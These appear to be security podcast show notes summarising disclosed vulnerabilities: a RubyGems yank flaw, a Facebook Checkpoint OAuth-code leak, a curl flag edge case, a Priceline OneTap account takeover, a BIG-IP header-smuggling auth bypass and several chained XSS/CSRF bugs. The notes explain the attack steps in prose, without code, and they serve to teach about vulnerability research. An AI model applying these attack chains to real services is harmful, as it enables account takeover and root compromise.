Show Notes

145 - Yanking Rubygems, BIG-IP Auth Bypass, and a Priceline Account Takeover

Interesting but fairly simple vuln in rubygems. It’s a design flaw or logic bug in the way versioning works when yanking a gem. You’re only supposed to be able to yank a gem that you / your API key has ownership over for obvious reasons. The problem is, rubygems would use a user-provided slug for the version of the package, and it wouldn’t take into account the fact a user could intentionally use the slug to collide with a different package name.

The example they give is if an attacker had a package called rails-html. If there was a victim package such as rails-html-sanitizer-1.4.2, an attacker can use the version slug to build up that package name and yank it.

A chain of bugs starting with a “third party” information disclosure, and leading to an account takeover. The third-party aspect can be argued but as a vuln classification it feels like the best fit for the root of this issue.

Starting off, the issue is within Facebook’s Checkpoint system. Kinda like a captive portal for a web-application. Make any request to Facebook, and it gets redirects to Checkpoint if the account is in a state requiring it like MFA, temporary ban enforcement, or for this issue, displaying a captcha before the user can continue to use Facebook.

On the Captcha page, an iframe is loaded to display the captcha. This iframe’s URL points to Facebook’s Sandbox domain, and has a parameter referer which contains the URL for the page hosting the iframe. As Checkpoint pages may include a next parameter used to indicate the original page the user tried to access (and where to go after the Checkpoint has been completed). This next parameter can leak potentially sensitive information, if for example a user were redirected to the Checkpoint following an Oauth flow, the code for that user may be exposed to the Facebook Sandbox

Despite this cross-context leak it is not yet usable by an attacker. They would still a couple things:

  1. They need to be able to read that URL somehow, the iframe is not a page they control, nor is the page loading the iframe. To do this the author started off by finding an XSS within the Facebook Sandbox domain. This was effectively a non-issue as there was a intended feature for developers to upload HTML files and have them served within the sandbox. This places their malicious code in a similar context to the target information.

For this attack, if you could have an iframe with attacker controlled javascript in the Facebook Sandbox on the same page as a iframe containing the Facebook Checkpoint. The attacker iframe, would be able to go through the window.opener to access the parent page, then access its iframes (the Checkpoint iframe), and since they are on the same domain, it would be able to read the location.href of the iframe inside that Checkpoint frame. I’ll admit this setup is a little-bit confusing and I’m not 100% sure I’ve got it right, but the author got it to work, so trust the process I suppose.

  1. Most accounts will not be redirected to the Checkpoint system so an attacker would need a way to target users and get them into the Checkpoint. For this, the fact that the Login and Logout systems were CSRF-able was used to log a victim out of their own account and into the attacker’s account which would be in the Checkpoint state.

Putting everything together you’ve got your attack page with two iframes, one pointing to the Facebook Sandbox and the other we will call target.

  • Logout the victim using the Logout CSRF
  • Login the victim to an account that will be redirected to the Checkpoint using the Login CSRF
  • Have the target frame open the Google OAuth flow. – As the victim should have already approved the Facebook app, they should almost immediately be redirected back to the Facebook oauth reciever with the code parameter.
  • Checkpoint will catch this request, and redirect them
  • The Checkpoint page will load the Facebook Sandbox iframe with the code as part of the referer parameter.
  • The attacker can then try to read the target.frames[0].location.href and get the code from the URL.

A nice little logic error abusing an edge case between two different command flags. Curl may remove the wrong file when --no-clobber and --remove-on-error flags are used together. What happens is that --no-clobber will tell curl not to overwrite an existing file, so if a file already exists it simply appends a number to the original file name. Later, if an error happens --remove-on-error is not aware of the new filename and will attempt to remove the original filename that curl was trying to not to clobber.

An actual attack abusing this is hard to imagine, requiring a rather constrained situation to be exploited but it is a great example of bugs that exist in the intersection between different features creating problematic edge cases.

Authentication bug in Priceline through the use of Google OneTap. The problem is that they assume emails provided through Google OneTap are verified and authentic. While this is true for regular google authentication, OneTap expects you to check the email_verified field to ensure the email is valid, which Priceline didn’t. This made it possible for an attacker to register the domain of a victim’s email with Gsuite (even if they didn’t own it / verify it), and be able to login to that account through OneTap.

Authentication bug for this sensitive /mgmt/tm/util/bash endpoint, which as the name suggests, will take commands and execute them. The endpoint was protected by authentication, but that authentication was vulnerable to a kind of desync. F5 has a custom apache module called, which would register a hook that would check request headers for an X-F5-Auth-Token header. If this was present, the request would be forwarded to the iControl REST service. If not, the Authorization header is checked, and if credentials don’t match the request is rejected. The iControl REST service will check to see if a token was given, and it’ll validate it if so. If no token was given, it continues onward assuming the request was already authenticated.

The problem is, mod_auth_pam would check for X-F5-Auth-Token before the Connection header was processed. It was possible to sneak this header into a Connection header, get the request passed to the iControl REST service, and have the token dropped before it could be validated, hitting that edge-case where iControl assumes you’re authenticated. This gives command execution as root.

Three bugs or chains of bugs that are typically the type to be thrown out or dismissed, but were exploitable in these cases with some tricks. All of these attacks were in undisclosed targets, though the general context is provided.

CSS Injection + Clickjacking The first case was a site that allowed you to register a community under a subdomain, which you could stylize with custom theme colors and such. These choices were put into a stylesheet with no sanitization, so quotes could be used to breakout and inject CSS. To exploit it here, they take advantage of the fact that every community will include a settings page, which allows users to change global settings across communities (like their email). They used the CSS injection to change that settings page into a ‘phishing’-style page, where it had text for “click here to view contents”, which would then submit the change email form for an attacker controlled email address.

Drag+Drop XSS + Cookie Bomb Second case was an online photo editor, which allowed drag and drop to upload photos. The problem here is it would use a jquery selector on a textarea, and use the decoded URL from the drag+drop and pass it to html(), which could be XSS’d. At first, didn’t seem too useful as there was an oauth system but no state parameter / tracking going on. You could send a request to the login page and retrieve a token through the redirect, but that token would then get consumed and invalidated. The trick here was to use cookie bombing to create request headers that exceeded the server limit (8kb on Apache). In this case, you’d be able to get the token, but the request would fail and thus the token wouldn’t get used before an attacker could use it.

Self XSS + Login/Logout CSRF Final case was a blogging-type platform based on an old version of TinyMCE. This version had a known XSS in the editor. This seemed useless though because it was only in the editor and it was a self XSS. They were able to chain this with a CSRF in the login/logout functionality to make it more practical though. While the regular login/logout had anti-CSRF tokens, facebook over oauth didn’t. They could tamper with the state and get a victim account to login to their own attacker account through facebook oauth. This allowed an attacker to XSS the victim.

At this point this is still limited, as the victim would be logged into the attacker’s account and not their own. However, with XSS, they could then send a request in a new tab to log the victim back into their own account. This results in a tab where an attacker has XSS logged in their own account, and a second tab where the victim is logged into their account. Since they’re under the same origin, there’s no security isolation, and the attacker now can change the email of the victim account in the other tab and takeover the account.